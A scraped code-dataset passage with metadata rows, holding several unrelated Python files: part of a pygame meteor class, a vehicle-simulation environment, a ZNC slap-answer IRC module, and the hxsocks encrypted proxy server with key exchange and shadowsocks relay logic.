        self.img = pygame.transform.rotate(pygame.transform.scale(img, (self.size, self.size)), random.randint(0, 360))
        # Heading in degrees, kept in (-180, 180]; see move() for the mapping to x/y.
        self.direction = random.choice([random.randint(-180, -100), random.randint(100, 180)])
        self.isAlive = True
        # NOTE(review): collision radius is a constant 47 regardless of self.size —
        # confirm this is intended rather than size-dependent.
        self.radius = 47
        self.maxhealth = self.size * 3
        self.health = self.maxhealth
        self.baseRotation = random.randint(1, 10)
        # Recently collided meteors, each as [meteor, remaining_cooldown_ms].
        self.contacts = []

    def render(self, window):
        """Per-frame update: move, draw, then run collision/health bookkeeping."""
        self.move()
        self.draw(window)
        self.checkBorders()
        self.checkBeat()
        self.checkHealth()
        self.updateContacts()

    def updateContacts(self):
        # Tick down each contact cooldown by one frame's worth of ms; drop expired ones.
        clone = self.contacts.copy()
        for contact in clone:
            if contact[1] < 1000 / Config.FPS:
                self.contacts.remove(contact)
            else: contact[1] -= 1000 / Config.FPS

    def checkBeat(self):
        """Test collisions against all entities and apply their effects."""
        clone = entities.entities.copy()
        for entity in clone:
            if not isinstance(entity, Meteor) and entity.checkCollision((self.x, self.y)):
                # Hit a non-meteor entity: deal damage and destroy this meteor.
                entity.takeDamage(self.damage)
                self.diy()
            elif isinstance(entity, Meteor) and entity.checkCollisionWithAnotherMeteor(self) and entity != self:
                # Meteor-vs-meteor: bounce both, unless they are still in cooldown.
                isContacted = False
                for contact in self.contacts:
                    if contact[0] == entity: isContacted = True
                if not isContacted:
                    entity.beat(self)
                    self.beat(entity)

    def beat(self, another):
        """Deflect this meteor after a collision with *another* meteor."""
        # Remember the collision for 500 ms so the same pair does not re-collide
        # on every subsequent frame while they overlap.
        self.contacts.append([another, 500])
        def getDifferenceBetweenDegrees(deg1, deg2):
            if deg1 < 0: deg1 = 360 + deg1
            if deg2 < 0: deg2 = 360 + deg2
            return deg1 - deg2
        aks = another.kineticStrong
        # NOTE(review): heading change weighted by combined kinetic strength over
        # the other meteor's — presumably an ad-hoc bounce approximation; confirm.
        self.direction += getDifferenceBetweenDegrees(self.direction, another.direction) * (self.kineticStrong + aks) / aks
        self.fixDirection()

    def checkCollisionWithAnotherMeteor(self, another):
        # Circle-vs-circle overlap test between the two meteors.
        return math.sqrt(abs(another.x - self.x) ** 2 + abs(another.y - self.y) ** 2) <= self.radius + another.radius

    def fixDirection(self):
        # Normalize the heading back into the (-180, 180] range.
        while self.direction > 180:
            self.direction += -360
        while self.direction < -180:
            self.direction += 360

    def draw(self, window):
        window.blit(self.img, (self.x, self.y))

    def diy(self):
        # Destroy this meteor, spawning explosion particles first.
        self.addDeathParticles()
        self.isAlive = False

    def move(self):
        """Advance the position one frame according to the current heading."""
        self.fixDirection()
        def reverse(deg):
            # Mirror headings beyond +/-90 back into the front half-plane.
            if deg > 90: return 180 - deg
            if deg < -90: return -180 - deg
        d = self.direction
        movementX = 0
        movementY = 0
        if d <= 90 and d >= -90:
            movementX = self.speed * -d / 90
        else:
            movementX = self.speed * -reverse(d) / 90
        if d >= 0:
            movementY = self.speed * (90 - d) / 90
        elif d < 0:
            movementY = self.speed * (90 + d) / 90
        self.x += movementX
        # Screen y grows downward; subtracting moves the meteor "up" in math terms.
        self.y -= movementY

    def checkBorders(self):
        # Despawn once fully outside the screen bounds.
        if self.x > Config.WIDTH + self.size or self.x < -self.size:
            self.isAlive = False
        if self.y > Config.HEIGHT + self.size or self.y < -self.size:
            self.isAlive = False

    def checkHealth(self):
        if self.health <= 0:
            self.diy()

    def addDeathParticles(self):
        entities.effects.explosionEffect((self.x, self.y))
| Krakozaybr/Meteorro | cooperate/meteor.py | meteor.py | py | 3,997 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "entity.Entity",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "Config.WIDTH",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"l... |
42822681247 | from math import dist, inf
from typing import Optional
from random import random, choice
from aasd.vehicle import Vehicle, VehicleType
class Environment:
    """A bounded 2-D world that tracks all vehicles in the simulation."""

    def __init__(self, width: int = 1280, height: int = 720, object_size: int = 10, chance_to_crash: float = 0.001):
        self.width = width
        self.height = height
        self.obj_size: int = object_size
        self.vehicles: list[Vehicle] = []
        self.chance_to_crash: float = chance_to_crash

    def register_vehicle(self, vehicle: Vehicle):
        """Add *vehicle* to the simulation."""
        self.vehicles.append(vehicle)

    def unregister_vehicle(self, vehicle: Vehicle):
        """Remove *vehicle* from the simulation."""
        self.vehicles.remove(vehicle)

    def get_emergency_vehicles(self) -> list[Vehicle]:
        """Return every vehicle of type Emergency."""
        return [
            vehicle
            for vehicle in self.vehicles
            if vehicle.type is VehicleType.Emergency
        ]

    def get_nearby_vehicles(self, caller: Vehicle, radius: float):
        """Return all vehicles other than *caller* within *radius* of it."""
        return [
            vehicle
            for vehicle in self.vehicles
            if is_nearby(vehicle, caller, radius) and vehicle is not caller
        ]

    def get_random_coordinates(self) -> tuple[float, float]:
        """Return random (x, y) inside the world, clamped to its bounds."""
        # The +5 offset keeps spawn points off the very edge; clamp in case the
        # offset pushes a coordinate past the boundary.
        x = min(random() * self.width + 5, float(self.width))
        y = min(random() * self.height + 5, float(self.height))
        return x, y

    def move_vehicles(self):
        """Advance every vehicle one step, keeping it inside the world."""
        for vehicle in self.vehicles:
            vehicle.move(self.width - self.obj_size, self.height - self.obj_size)

    def make_random_accident(self) -> str:
        """Mark a random vehicle as crashed and return its id."""
        vehicle = choice(self.vehicles)
        vehicle.type = VehicleType.Crashed
        return vehicle.id

    def get_vehicle(self, vehicle_id: str) -> Optional[Vehicle]:
        """Return the vehicle with *vehicle_id*, or None when unknown."""
        return next((v for v in self.vehicles if v.id == vehicle_id), None)

    def get_closest_emergency_vehicle(self, x: float, y: float):
        """Return the emergency vehicle closest to (x, y), or None if there is none."""
        # Consistency fix: reuse get_emergency_vehicles() instead of duplicating
        # the type filter inline.
        closest_ev = None
        lowest_distance = inf
        for ev in self.get_emergency_vehicles():
            distance = dist(ev.get_coordinates(), (x, y))
            if distance < lowest_distance:
                lowest_distance = distance
                closest_ev = ev
        return closest_ev

    def are_vehicles_nearby(self, id1: str, id2: str, radius: float) -> bool:
        """True when both ids resolve to vehicles within *radius* of each other."""
        return is_nearby(self.get_vehicle(id1), self.get_vehicle(id2), radius)
def is_nearby(vehicle1: Optional[Vehicle], vehicle2: Optional[Vehicle], radius: float) -> bool:
    """Return True when both vehicles exist and are within *radius* of each other."""
    both_present = vehicle1 is not None and vehicle2 is not None
    return both_present and dist(vehicle1.get_coordinates(), vehicle2.get_coordinates()) <= radius
| Pruxon/AASD | aasd/environment.py | environment.py | py | 2,733 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "aasd.vehicle.Vehicle",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "aasd.vehicle.Vehicle",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "aasd.vehicle.Vehicle",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "aasd.v... |
36173205593 | import random
import json
import znc
class slapanswer(znc.Module):
    """ZNC network module that replies with a pacifist quote when slapped."""
    description = 'Answer slaps'
    module_types = [znc.CModInfo.NetworkModule]

    def OnLoad(self, args, message):
        """Load persisted answers from ZNC's registry, seeding defaults on first run."""
        self.default_answers = [
            '"Be kind whenever possible. It is always possible." - Dalai Lama',
            '"Where ignorance is our master, there is no possibility of real'
            ' peace." - Dalai Lama',
            '"We can never obtain peace in the outer world until we make peace'
            ' with ourselves." - Dalai Lama',
            '"An eye for an eye will only make the whole world blind."'
            ' - Mahatma Gandhi',
            '"The best fighter is never angry" - Lao Tzu',
            '"Peace cannot be achieved through violence, it can only be'
            ' attained through understanding." - Ralph Waldo Emerson',
            '"Silence is sometimes the best answer" - Dalai Lama',
        ]
        if 'answers' in self.nv:
            # Answers persist across restarts as JSON in the module registry.
            self.ANSWERS = json.loads(self.nv['answers'])
        else:
            self.ANSWERS = self.default_answers
            self.save_answers()
        return True

    def OnModCommand(self, cmd):
        """Dispatch a user command: help / add / remove / reset / list."""
        split = cmd.split()
        if not split:
            # Bug fix: an empty command used to raise IndexError on split[0].
            self.command_help()
            return
        command = str(split[0]).lower()
        args = [a.lower() for a in split[1:]]
        if command == 'help':
            self.command_help()
        elif command == 'add':
            self.command_add(args)
        elif command == 'remove':
            self.command_remove(args)
        elif command == 'reset':
            self.command_reset()
        elif command == 'list':
            self.command_list()

    def save_answers(self):
        """Persist the current answer list to ZNC's module registry."""
        self.nv['answers'] = json.dumps(self.ANSWERS)

    def command_help(self):
        """Print usage information for all module commands."""
        self.PutModule('\n'.join([
            'add <msg> | add a msg (replace nick with {nick})',
            'remove <id> | remove msg with id <id> (get id\'s with "list")',
            'reset | reset msgs to default',
            'list | get a list with msgs'
        ]))
        return True

    def command_add(self, args):
        """Append a new answer; line breaks are rejected (registry is line-based)."""
        msg = ' '.join(args)
        if '\n' in msg:
            self.PutModule('ERROR: Line-Breaks are not allowed in answers!')
            return True
        self.ANSWERS.append(msg)
        self.save_answers()
        self.PutModule('Successfully added answer!')
        return True

    def command_remove(self, args):
        """Remove the answer with the given numeric id."""
        try:
            answer_id = int(args[0])
        except (IndexError, ValueError):
            # Bug fix: the original only printed an error and then fell through,
            # crashing on the unbound answer_id (and it never caught a missing
            # argument at all). Abort here instead.
            self.PutModule('ERROR: Invalid ID!')
            return True
        if answer_id < len(self.ANSWERS) and answer_id >= 0:
            del self.ANSWERS[answer_id]
            self.save_answers()
            self.PutModule('Successfully removed answer!')
        else:
            self.PutModule(
                'ERROR: Invalid ID! Try "list" for a list of id\'s!'
            )
        return True

    def command_reset(self):
        """Restore the default answer list."""
        self.ANSWERS = self.default_answers
        self.save_answers()
        self.PutModule('Successfully reset answers!')
        return True

    def command_list(self):
        """Print every answer together with its id."""
        for index, value in enumerate(self.ANSWERS):
            self.PutModule('{} | {}'.format(index, value))
        return True

    def OnChanAction(self, invoker, channel, message):
        """React when a channel /me action slaps our nick."""
        own_nick = self.GetNetwork().GetIRCNick().GetNick()
        own_host = self.GetNetwork().GetIRCNick().GetHostMask()
        nick = invoker.GetNick()
        channel = channel.GetName()
        msg = str(message)
        if 'slap' in msg and own_nick in msg:
            self.answer_slap(channel, nick, own_host)
        return znc.CONTINUE

    def answer_slap(self, channel, nick, own_host):
        """Send a random answer to *channel* and echo it back to the attached client."""
        msg = random.choice(self.ANSWERS)
        if '{nick}' in msg:
            msg = msg.format(nick=nick)
        msg = 'PRIVMSG {channel} :{msg}'.format(channel=channel, msg=msg)
        self.GetNetwork().PutIRC(msg)
        self.GetNetwork().PutUser(':{own_host} {msg}'.format(
            own_host=own_host, msg=msg))
| Thor77/SlapAnswer | slapanswer.py | slapanswer.py | py | 3,958 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "znc.Module",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "znc.CModInfo",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "json.loads",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_num... |
32365176970 | from __future__ import with_statement
import os
import sys
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import errno
import socket
import threading
import time
import random
import select
import SocketServer
import struct
import hashlib
import hmac
import logging
import io
import json
import urlparse
import traceback
from collections import defaultdict, deque
from util import create_connection, get_ip_address, parse_hostport
import encrypt
from encrypt import compare_digest
from ecc import ECC
__version__ = '0.0.1'
DEFAULT_METHOD = 'aes-128-cfb'
DEFAULT_HASH = 'sha256'
MAC_LEN = 16
CTX = b'hxsocks'
USER_PASS = {'user': 'pass'}
SERVER_CERT = None
class KeyManager:
    """Tracks per-user ephemeral ECDH keys for the hxsocks handshake.

    All state is class-level: each client public key (stored by its MD5
    digest) maps to its user, the derived shared secret, and a creation
    timestamp; each user additionally keeps a deque of their recent keys.
    """
    userpkeys = defaultdict(deque)   # user -> deque of key digests
    pkeyuser = {}                    # key digest -> user
    pkeykey = {}                     # key digest -> shared secret
    pkeytime = {}                    # key digest -> creation time

    @classmethod
    def create_key(cls, user, client_pkey, klen):
        """Perform the server side of the key exchange for *user*.

        Returns (server_pub_key, password) on success, or (0, 0) when the
        client public key was already registered (possible replay).
        """
        if cls.notvalid(user, client_pkey):
            return 0, 0
        # Keep at most 4 concurrent keys per user; evict the oldest.
        if len(cls.userpkeys[user]) > 3:
            cls.del_key(cls.userpkeys[user][0])
        dh = ECC(klen)
        shared_secret = dh.get_dh_key(client_pkey)
        # Index all records by the MD5 digest of the client public key.
        client_pkey = hashlib.md5(client_pkey).digest()
        cls.userpkeys[user].append(client_pkey)
        cls.pkeyuser[client_pkey] = user
        cls.pkeykey[client_pkey] = shared_secret
        cls.pkeytime[client_pkey] = time.time()
        return dh.get_pub_key(), USER_PASS[user]

    @classmethod
    def notvalid(cls, user, client_pkey):
        # A key is invalid if its digest was already registered by anyone.
        return hashlib.md5(client_pkey).digest() in cls.pkeyuser

    @classmethod
    def check_key(cls, pubk):
        """Return 1 (truthy) when *pubk* is unknown or older than 6 hours,
        deleting expired keys; returns None (falsy) for a valid key."""
        if pubk not in cls.pkeykey:
            return 1
        if cls.pkeytime[pubk] < time.time() - 6 * 3600:
            cls.del_key(pubk)
            return 1

    @classmethod
    def del_key(cls, pkey):
        # Remove every record of *pkey* from all four tables.
        user = cls.pkeyuser[pkey]
        del cls.pkeyuser[pkey]
        del cls.pkeytime[pkey]
        del cls.pkeykey[pkey]
        cls.userpkeys[user].remove(pkey)

    @classmethod
    def get_user_by_pubkey(cls, pubkey):
        # Raises KeyError for unknown keys; callers gate on check_key() first.
        return cls.pkeyuser[pubkey]

    @classmethod
    def get_skey_by_pubkey(cls, pubkey):
        return cls.pkeykey[pubkey]
class HXSocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """Threaded TCP server configured from an ss:// or hxs:// server URI.

    (Python 2 code: uses the `SocketServer` and `urlparse` module names.)
    """
    allow_reuse_address = True

    def __init__(self, serverinfo, forward, RequestHandlerClass, bind_and_activate=True):
        self.serverinfo = serverinfo
        # Ports for which connections to localhost are still permitted.
        self.forward = set(forward)
        p = urlparse.urlparse(serverinfo)
        if p.scheme == 'ss':
            # ss://method:password@host:port
            self.PSK, self.method = p.password, p.username
        elif p.scheme == 'hxs':
            # hxs://host:port/?PSK=...&method=...
            self.PSK = urlparse.parse_qs(p.query).get('PSK', [''])[0]
            self.method = urlparse.parse_qs(p.query).get('method', [DEFAULT_METHOD])[0]
        else:
            raise ValueError('bad serverinfo: {}'.format(self.serverinfo))
        q = urlparse.parse_qs(p.query)
        proxy = q.get('proxy', [''])[0]
        # Optional upstream proxy, parsed to a (host, port) tuple.
        self.proxy = parse_hostport(proxy) if proxy else None
        # User-Agent string presented when masquerading as a web server.
        self.server = q.get('UA', ['nginx/1.2.2'])[0]
        self.hash_algo = q.get('hash', [DEFAULT_HASH])[0].upper()
        # Shadowsocks compatibility: enabled when a PSK exists and ss != '0'.
        self.ss = self.PSK and q.get('ss', ['1'])[0] == '1'
        addrs = socket.getaddrinfo(p.hostname, p.port)
        if not addrs:
            raise ValueError('cant resolve listen address')
        # Use the address family (IPv4/IPv6) of the first resolved address.
        self.address_family = addrs[0][0]
        server_address = (p.hostname, p.port)
        SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
class HXSocksHandler(SocketServer.StreamRequestHandler):
timeout = 10
bufsize = 1024 * 16
def handle(self):
try:
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
pskcipher = encrypt.Encryptor(self.server.PSK, self.server.method)
self.connection.settimeout(self.timeout)
data = self.rfile.read(pskcipher.iv_len)
pskcipher.decrypt(data)
while True:
try:
data = self.rfile.read(1)
self.connection.settimeout(self.timeout)
cmd = ord(pskcipher.decrypt(data))
except Exception as e:
logging.error('cmd Exception: server %s %r from %s:%s' % (self.server.server_address[1], e, self.client_address[0], self.client_address[1]))
break
if cmd == 10: # client key exchange
rint = random.randint(64, 255)
req_len = pskcipher.decrypt(self.rfile.read(2))
req_len = struct.unpack('>H', req_len)[0]
data = pskcipher.decrypt(self.rfile.read(req_len))
data = io.BytesIO(data)
ts = data.read(4)
if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
# possible replay attack
logging.error('bad timestamp. client_ip: %s' % self.client_address[0])
break
pklen = ord(data.read(1))
client_pkey = data.read(pklen)
client_auth = data.read(32)
def _send(data):
data = struct.pack('>H', len(data)) + data
self.wfile.write(pskcipher.encrypt(data))
client = None
for user, passwd in USER_PASS.items():
h = hmac.new(passwd.encode(), ts + client_pkey + user.encode(), hashlib.sha256).digest()
if compare_digest(h, client_auth):
client = user
break
else:
logging.error('user not found. client_ip: %s' % self.client_address[0])
break
pkey, passwd = KeyManager.create_key(client, client_pkey, pskcipher.key_len)
if pkey:
logging.info('new key exchange. client: %s, ip: %s' % (client, self.client_address[0]))
h = hmac.new(passwd.encode(), client_pkey + pkey + client.encode(), hashlib.sha256).digest()
scert = SERVER_CERT.get_pub_key()
signature = SERVER_CERT.sign(h, self.server.hash_algo)
data = chr(0) + chr(len(pkey)) + chr(len(scert)) + chr(len(signature)) + pkey + h + scert + signature + os.urandom(rint)
_send(data)
continue
else:
logging.error('Private_key already registered. client: %s, ip: %s' % (client, self.client_address[0]))
# KeyManager.del_key(hashlib.md5(client_pkey).digest())
break
elif cmd == 11: # a connect request
client_pkey = pskcipher.decrypt(self.rfile.read(16))
rint = random.randint(64, 2048)
def _send(code, cipher):
if code == 1:
data = os.urandom(rint)
data = pskcipher.encrypt(struct.pack('>H', rint)) + data
self.wfile.write(data)
else:
ct = cipher.encrypt(chr(code) + os.urandom(rint-1))
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
self.wfile.write(data)
if KeyManager.check_key(client_pkey):
logging.error('client key not exist or expired. client ip: %s' % self.client_address[0])
ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
self.rfile.read(ctlen)
_send(1, None)
continue
user = KeyManager.get_user_by_pubkey(client_pkey)
cipher = encrypt.AEncryptor(KeyManager.get_skey_by_pubkey(client_pkey), self.server.method, CTX)
ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
ct = self.rfile.read(ctlen)
data = cipher.decrypt(ct)
buf = io.BytesIO(data)
ts = buf.read(4)
if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
logging.error('bad timestamp, possible replay attrack. client ip: %s' % self.client_address[0])
# KeyManager.del_key(client_pkey)
# _send(1, None)
break
host_len = ord(buf.read(1))
addr = buf.read(host_len)
port = struct.unpack('>H', buf.read(2))[0]
if self._request_is_loopback((addr, port)) and port not in self.server.forward:
logging.info('server %d access localhost:%d denied. from %s:%d, %s' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1], user))
_send(2, cipher)
continue
try:
logging.info('server %d request %s:%d from %s:%d, %s' % (self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1], user))
remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
_send(0, cipher)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warning('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
_send(2, cipher)
continue
if self.forward_tcp(self.connection, remote, cipher, pskcipher, timeout=60):
break
self.connection.settimeout(60)
logging.debug('hxsocks connect reusable, except next connection')
elif cmd in (1, 3, 4, 17, 19, 20):
# A shadowsocks request
if not self.server.ss:
logging.warning('shadowsocks not enabled for this server. port: %d' % self.server.server_address[1])
break
ota = cmd & 16
if cmd & 15 == 1:
_addr = pskcipher.decrypt(self.rfile.read(4))
addr = socket.inet_ntoa(_addr)
elif cmd & 15 == 3:
_addr = pskcipher.decrypt(self.rfile.read(1))
addr = pskcipher.decrypt(self.rfile.read(ord(_addr)))
_addr += addr
elif cmd & 15 == 4:
_addr = socket.AF_INET6, pskcipher.decrypt(self.rfile.read(16))
addr = socket.inet_ntop(_addr)
port = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
# verify
if ota:
header = chr(cmd) + _addr + struct.pack('>H', port)
self._ota_chunk_idx = 0
rmac = pskcipher.decrypt(self.rfile.read(10))
key = pskcipher.decipher_iv + pskcipher.key
mac = hmac.new(key, header, hashlib.sha1).digest()[:10]
if not compare_digest(rmac, mac):
logging.error("OTA Failed!!")
break
if self._request_is_loopback((addr, port)) and port not in self.server.forward:
logging.info('server %d access localhost:%d denied. from %s:%d' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1]))
break
try:
remote = None
logging.info('server %d SS request %s:%d from %s:%d %s' % (self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1], 'with ota' if ota else ''))
remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
if ota:
return self.ssforward_tcp_ota(self.connection, remote, pskcipher, timeout=60)
return self.ssforward_tcp(self.connection, remote, pskcipher, timeout=60)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
else:
logging.warning('unknown cmd %d, bad encryption key?' % cmd)
break
ins, _, _ = select.select([self.connection], [], [], 1)
while ins:
data = self.connection.recv(self.bufsize)
if not data:
break
ins, _, _ = select.select([self.connection], [], [], 1)
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
def forward_tcp(self, local, remote, cipher, pskcipher, timeout=60):
    """Relay an hxsocks connection between the client (local) and the target (remote).

    Client-bound chunks are padded (1 pad-length byte + payload + zero padding)
    and double-encrypted: payload with the session `cipher`, the 2-byte length
    prefix with `pskcipher`.  Returns readable + writeable (0..2) so the caller
    can tell whether the client connection is still reusable.
    """
    readable = 1    # client may still send to us
    writeable = 1   # we may still send to the client
    closed = 0      # client signalled close via empty length prefix
    close_count = 0 # consecutive select() timeouts
    fds = [local, remote]
    total_send = 0  # bytes forwarded client-ward, used to decide on cover traffic
    try:
        while fds:
            if len(fds) < 2:
                # one side already half-closed: drain the other side quickly
                timeout = 3
            ins, _, _ = select.select(fds, [], [], timeout)
            if not ins:
                logging.debug('timed out')
                close_count += 1
                if remote in fds:
                    fds.remove(remote)
                    remote.shutdown(socket.SHUT_RD)
                if writeable:
                    # send an empty (padding-only) chunk to tell the client we are done
                    padding_len = random.randint(8, 255)
                    data = chr(padding_len) + b'\x00' * padding_len
                    ct = cipher.encrypt(data)
                    data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                    local.sendall(data)
                    writeable = 0
                if close_count > 2:
                    break
            if local in ins:
                ct_len = self.rfile.read(2)
                if not ct_len:
                    logging.debug('client closed')
                    fds.remove(local)
                    remote.shutdown(socket.SHUT_WR)
                    closed = 1
                else:
                    ct_len = struct.unpack('>H', pskcipher.decrypt(ct_len))[0]
                    ct = self.rfile.read(ct_len)
                    data = cipher.decrypt(ct)
                    pad_len = ord(data[0])   # first byte: padding length
                    cmd = ord(data[-1])      # last byte doubles as close-mode flag
                    if 0 < pad_len < 8:
                        # fake chunk, drop
                        if pad_len == 1 and writeable:
                            # pad_len 1 is a request for cover traffic: answer with a fake chunk
                            _data = chr(2) + b'\x00' * random.randint(1024, 8196)
                            ct = cipher.encrypt(_data)
                            _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                            local.sendall(_data)
                    else:
                        data = data[1:0-pad_len] if pad_len else data[1:]
                        if data:
                            remote.sendall(data)
                        else:
                            # empty payload == graceful close from the client
                            logging.debug('client close, gracefully')
                            if cmd:
                                remote.close()
                            else:
                                remote.shutdown(socket.SHUT_WR)
                            fds.remove(local)
                            readable = 0
            if remote in ins:
                data = remote.recv(self.bufsize)
                if not data:
                    writeable = 0
                    fds.remove(remote)
                    if total_send < 8196 and random.random() < 0.5:
                        # short-lived connection: sometimes emit cover traffic before closing
                        _data = chr(2) + b'\x00' * random.randint(1024, 8196)
                        ct = cipher.encrypt(_data)
                        _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                        local.sendall(_data)
                # if writeable and readable and not closed and random.random() < 0.1:
                #     # request fake chunk
                #     _data = chr(1) + b'\x00' * random.randint(1024, 8196)
                #     ct = cipher.encrypt(_data)
                #     _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                #     local.sendall(_data)
                # runs even when data is empty: an empty padded chunk signals close
                total_send += len(data)
                padding_len = random.randint(8, 255)
                data = chr(padding_len) + data + b'\x00' * padding_len
                ct = cipher.encrypt(data)
                data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                local.sendall(data)
            if closed:
                break
    except socket.timeout:
        pass
    except (OSError, IOError) as e:
        if e.args[0] in (errno.EBADF,):
            return
        if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
            raise
    except Exception as e:
        logging.error(repr(e))
        logging.error(traceback.format_exc())
    finally:
        try:
            remote.close()
        except (OSError, IOError):
            pass
        self.connection.settimeout(600)
        # NOTE: return inside finally suppresses any in-flight exception here
        return readable + writeable
def ssforward_tcp(self, local, remote, cipher, timeout=60):
    """Relay a plain shadowsocks stream between client and remote.

    Client-side traffic is decrypted before forwarding, remote-side traffic
    is encrypted before sending back.  Stops on idle timeout or when either
    side closes; both sockets are closed on exit.
    """
    try:
        finished = False
        while not finished:
            ready, _, _ = select.select([local, remote], [], [], timeout)
            if not ready:
                break  # idle timeout
            # (source, destination, transform) for each direction
            for src, dst, transform in ((local, remote, cipher.decrypt),
                                        (remote, local, cipher.encrypt)):
                if src not in ready:
                    continue
                chunk = src.recv(self.bufsize)
                if not chunk:
                    finished = True  # peer closed
                    break
                dst.sendall(transform(chunk))
    except socket.timeout:
        pass
    except (OSError, IOError) as e:
        if e.args[0] in (errno.EBADF,):
            return
        if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
            raise
    except Exception as e:
        logging.error(repr(e))
        logging.error(traceback.format_exc())
    finally:
        for sock in (remote, local):
            try:
                sock.close()
            except (OSError, IOError):
                pass
def ssforward_tcp_ota(self, local, remote, cipher, timeout=60):
    """Relay a shadowsocks stream with One-Time-Auth chunk verification.

    Each client chunk is: 2-byte length | 10-byte HMAC-SHA1 tag | payload,
    all encrypted with `cipher`.  The per-chunk HMAC key is the decipher IV
    concatenated with the big-endian chunk index (self._ota_chunk_idx, set
    up by the caller).  Chunks failing verification are dropped, not fatal.
    """
    try:
        while 1:
            ins, _, _ = select.select([local, remote], [], [], timeout)
            if not ins:
                break
            if local in ins:
                # read order matters: length, then tag, then payload
                data_len = struct.unpack('>H', cipher.decrypt(self.rfile.read(2)))[0]
                rmac = cipher.decrypt(self.rfile.read(10))
                data = cipher.decrypt(self.rfile.read(data_len))
                index = struct.pack('>I', self._ota_chunk_idx)
                key = cipher.decipher_iv + index
                mac = hmac.new(key, data, hashlib.sha1).digest()[:10]
                if encrypt.compare_digest(rmac, mac):
                    # only advance the chunk counter on a verified chunk
                    self._ota_chunk_idx += 1
                    remote.sendall(data)
                else:
                    logging.warning('OTA Failed')
            if remote in ins:
                data = remote.recv(self.bufsize)
                if not data:
                    break
                local.sendall(cipher.encrypt(data))
    except socket.timeout:
        pass
    except (OSError, IOError) as e:
        if e.args[0] in (errno.EBADF,):
            return
        if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
            raise
    except Exception as e:
        logging.error(repr(e))
        logging.error(traceback.format_exc())
    finally:
        for sock in (remote, local):
            try:
                sock.close()
            except (OSError, IOError):
                pass
def _request_is_loopback(self, req):
    """Return True when the request target (host, port) points at a loopback
    address; returns None (falsy) when the address cannot be determined."""
    host = req[0]
    try:
        return get_ip_address(host).is_loopback
    except Exception:
        return None
def start_servers(config, forward):
    """Start one HXSocksServer thread per server definition in *config*.

    A bad entry is logged and skipped so the remaining servers still start.
    """
    for entry in config:
        try:
            logging.info('starting server: %s' % entry)
            server = HXSocksServer(entry, forward, HXSocksHandler)
            worker = threading.Thread(target=server.serve_forever)
            worker.start()
        except Exception as err:
            logging.error('something wrong with config: %r' % err)
def main():
    """Entry point: configure logging, load (or create) the server certificate,
    read config.json for users/servers/forward rules, and start the servers.
    """
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)-8s %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
    hello = 'hxsocks-server %s' % __version__
    if gevent:
        hello += ' with gevent %s' % gevent.__version__
    print(hello)
    print('by v3aqb')
    # resolve files relative to this script's directory (hoisted: was repeated 4x)
    script_dir = os.path.dirname(os.path.abspath(__file__))
    cert_path = os.path.join(script_dir, 'cert.pem')
    global SERVER_CERT
    try:
        SERVER_CERT = ECC(from_file=cert_path)
    except Exception:
        # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
        logging.warning('server cert not found, creating...')
        SERVER_CERT = ECC(key_len=32)
        SERVER_CERT.save(cert_path)
    servers = ['hxs://0.0.0.0:9000']
    forward = []
    config_path = os.path.join(script_dir, 'config.json')
    if os.path.exists(config_path):
        global USER_PASS
        # use a context manager so the config file handle is closed (was leaked)
        with open(config_path) as f:
            d = json.loads(f.read())
        USER_PASS = d['users']
        servers = d['servers']
        forward = d.get('forward', [])
    for s in servers:
        logging.info('starting server: %s' % s)
        ssserver = HXSocksServer(s, forward, HXSocksHandler)
        threading.Thread(target=ssserver.serve_forever).start()
